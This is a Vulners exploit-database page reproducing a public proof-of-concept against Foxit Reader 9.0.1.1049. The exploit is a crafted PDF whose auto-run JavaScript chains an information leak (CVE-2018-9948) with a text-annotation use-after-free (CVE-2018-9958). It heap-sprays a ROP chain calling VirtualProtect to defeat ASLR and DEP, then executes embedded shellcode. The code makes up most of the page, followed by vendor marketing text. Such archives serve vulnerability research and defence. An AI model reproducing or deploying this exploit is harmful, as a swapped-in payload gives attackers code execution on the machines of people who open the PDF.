Vulners
Lucene search
Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR & DEP Bypass)
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
/*
# Exploit Title: Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)
# Date: 2018-08-04
# Exploit Author: Manoj Ahuje
# Tested on: Windows 7 Pro (x32)
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version: Foxit Reader 9.0.1.1049
# CVE: N/A
# Credits to "Mr_Me" for Reseach and initial exploit
#Details:
#This exploit make use heap space to store the shellcode in addition to UAF bypassing ASLR and DEP to get successful payload execution
*/
var heap_ptr = 0;
var foxit_base = 0;
function heap_spray(size){
var arr = new Array(size);
for (var i = 0; i < arr.length; i++) {
// re-claim and stack pivot-0x8
arr[i] = new ArrayBuffer(0x10000-0x8);//0xFFF8
var claimed = new Int32Array(arr[i]);
var c_length = claimed.length;
/* custom made ROP chain virtualalloc call
Author: Manoj Ahuje */
claimed[0x00] = foxit_base + 0x01A65184; //# PUSH EAX # POP ESP # POP EDI # POP ESI # POP EBX # POP EBP # RETN
claimed[0x01] = foxit_base + 0x01A65184;
claimed[0x02] = foxit_base + 0x01A65184;
claimed[0x03] = foxit_base + 0x01A65184;
claimed[0x04] = foxit_base + 0x14f9195; // # POP EBX # RETN
claimed[0x05] = foxit_base + 0x41414141; //
claimed[0x06] = foxit_base + 0x1f224fc; // # ptr to &VirtualProtect()
claimed[0x07] = foxit_base + 0x0e70281; // # MOV ESI,DWORD PTR DS:[EBX] # RETN
claimed[0x08] = foxit_base + 0x1582698; // # POP EBP # RETN
claimed[0x09] = foxit_base + 0xa0dbd; // # & jmp esp
claimed[0x0a] = foxit_base + 0x14ed06d; // # POP EBX # RETN
claimed[0x0b] = 0x00000201; // # 0x00000201-> ebx
claimed[0x0c] = foxit_base + 0x1e62f7e; // # POP EDX # RETN
claimed[0x0d] = 0x00000040; // # 0x00000040-> edx
claimed[0x0e] = foxit_base + 0x1ec06a9; // # POP ECX # RETN
claimed[0x0f] = foxit_base + 0x29bac74; // # &Writable location
claimed[0x10] = foxit_base + 0xb971f; // # POP EDI # RETN
claimed[0x11] = foxit_base + 0x177769e; // # RETN (ROP NOP)
claimed[0x12] = foxit_base + 0x1A89808; // # POP EAX # RETN
claimed[0x13] = 0x90909090; // # nop
claimed[0x14] = foxit_base + 0x129d4f0; // # PUSHAD # RETN
claimed[0x15] = 0x90909090;
claimed[0x16] = 0x90909090;
claimed[0x17] = 0x90909090;
claimed[0x18] = 0x90909090;
claimed[0x19] = 0x90909090;
claimed[0x1a] = 0x90909090;
//regular CALCULATOR shellcode
claimed[0x1b] = 0xe5d9e389;
claimed[0x1c] = 0x5af473d9;
claimed[0x1d] = 0x4a4a4a4a;
claimed[0x1e] = 0x4a4a4a4a;
claimed[0x1f] = 0x434a4a4a;
claimed[0x20] = 0x43434343;
claimed[0x21] = 0x59523743;
claimed[0x22] = 0x5058416a;
claimed[0x23] = 0x41304130;
claimed[0x24] = 0x5141416b;
claimed[0x25] = 0x32424132;
claimed[0x26] = 0x42304242;
claimed[0x27] = 0x58424142;
claimed[0x28] = 0x42413850;
claimed[0x29] = 0x49494a75;
claimed[0x2a] = 0x4e586b6c;
claimed[0x2b] = 0x57306362;
claimed[0x2c] = 0x53707770;
claimed[0x2d] = 0x6b696e50;
claimed[0x2e] = 0x39716455;
claimed[0x2f] = 0x6e645050;
claimed[0x30] = 0x6470426b;
claimed[0x31] = 0x434b6c70;
claimed[0x32] = 0x6e6c3662;
claimed[0x33] = 0x7562436b;
claimed[0x34] = 0x526b6e44;
claimed[0x35] = 0x46686452;
claimed[0x36] = 0x5037386f;
claimed[0x37] = 0x6446764a;
claimed[0x38] = 0x4e4f4b71;
claimed[0x39] = 0x354c774c;
claimed[0x3a] = 0x776c6131;
claimed[0x3b] = 0x374c7672;
claimed[0x3c] = 0x5a614a50;
claimed[0x3d] = 0x374d746f;
claimed[0x3e] = 0x38573971;
claimed[0x3f] = 0x30525a62;
claimed[0x40] = 0x6e376652;
claimed[0x41] = 0x6252506b;
claimed[0x42] = 0x624b6c30;
claimed[0x43] = 0x6c4c576a;
claimed[0x44] = 0x476c524b;
claimed[0x45] = 0x6d387461;
claimed[0x46] = 0x43587133;
claimed[0x47] = 0x50513831;
claimed[0x48] = 0x334b6c51;
claimed[0x49] = 0x35506769;
claimed[0x4a] = 0x6e534851;
claimed[0x4b] = 0x7539576b;
claimed[0x4c] = 0x54736948;
claimed[0x4d] = 0x4e79637a;
claimed[0x4e] = 0x6c64356b;
claimed[0x4f] = 0x6a51354b;
claimed[0x50] = 0x39514676;
claimed[0x51] = 0x6f4c6e6f;
claimed[0x52] = 0x444f4831;
claimed[0x53] = 0x4861364d;
claimed[0x54] = 0x6b783447;
claimed[0x55] = 0x69357450;
claimed[0x56] = 0x73337366;
claimed[0x57] = 0x5568494d;
claimed[0x58] = 0x474d436b;
claimed[0x59] = 0x68357454;
claimed[0x5a] = 0x4e686364;
claimed[0x5b] = 0x6638466b;
claimed[0x5c] = 0x59313344;
claimed[0x5d] = 0x6c766143;
claimed[0x5e] = 0x506c664b;
claimed[0x5f] = 0x504b4c4b;
claimed[0x60] = 0x656c4758;
claimed[0x61] = 0x6c436951;
claimed[0x62] = 0x6e34634b;
claimed[0x63] = 0x6831436b;
claimed[0x64] = 0x61694e50;
claimed[0x65] = 0x65746554;
claimed[0x66] = 0x514b5174;
claimed[0x67] = 0x7351734b;
claimed[0x68] = 0x427a6269;
claimed[0x69] = 0x396f6971;
claimed[0x6a] = 0x734f5170;
claimed[0x6b] = 0x4e6a436f;
claimed[0x6c] = 0x7832526b;
claimed[0x6d] = 0x316d4e6b;
claimed[0x6e] = 0x675a534d;
claimed[0x6f] = 0x4f4d6c71;
claimed[0x70] = 0x57324875;
claimed[0x71] = 0x43707770;
claimed[0x72] = 0x61306630;
claimed[0x73] = 0x6e514678;
claimed[0x74] = 0x6e6f706b;
claimed[0x75] = 0x6b6f5967;
claimed[0x76] = 0x784b4f65;
claimed[0x77] = 0x39656d70;
claimed[0x78] = 0x73565032;
claimed[0x79] = 0x6c666c58;
claimed[0x7a] = 0x6d6d4d55;
claimed[0x7b] = 0x496f494d;
claimed[0x7c] = 0x456c6545;
claimed[0x7d] = 0x454c7356;
claimed[0x7e] = 0x6b306b5a;
claimed[0x7f] = 0x5370394b;
claimed[0x80] = 0x4d453445;
claimed[0x81] = 0x6567426b;
claimed[0x82] = 0x70426343;
claimed[0x83] = 0x376a506f;
claimed[0x84] = 0x6b336670;
claimed[0x85] = 0x3045694f;
claimed[0x86] = 0x72313563;
claimed[0x87] = 0x7633654c;
claimed[0x88] = 0x4235754e;
claimed[0x89] = 0x67354558;
claimed[0x8a] = 0x00414170;
for (var j = 0x8b; j < c_length; j++) {
claimed[j] = 0x6d616e6a;
}
}
}
function leak(){
/*
Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
Found By: bit from meepwn team
*/
// alloc
var a = this.addAnnot({type: "Text"});
// free
a.destroy();
// reclaim
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
// leak the vftable
var leaked = stolen[0] & 0xffff0000;
// a hard coded offset to FoxitReader.exe base v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
foxit_base = leaked-0x01f50000;
}
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = 0x11000048;
for (var j = 0x01; j < rop.length; j++) {
rop[j] = 0x71727374;
}
}
}
function trigger_uaf(){
/*
Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
Found By: Steven Seeley (mr_me) of Source Incite
*/
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
// free
that.getAnnot(0, "uaf").destroy();
// reclaim freed memory
reclaim();
return 1;
}
}
});
a.point = arr;
}
leak();
heap_spray(0x1000);
trigger_uaf();
)>> trailer <</Root 1 0 R>>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Aug 2018 00:00Current
7.5High risk
Vulners AI Score7.5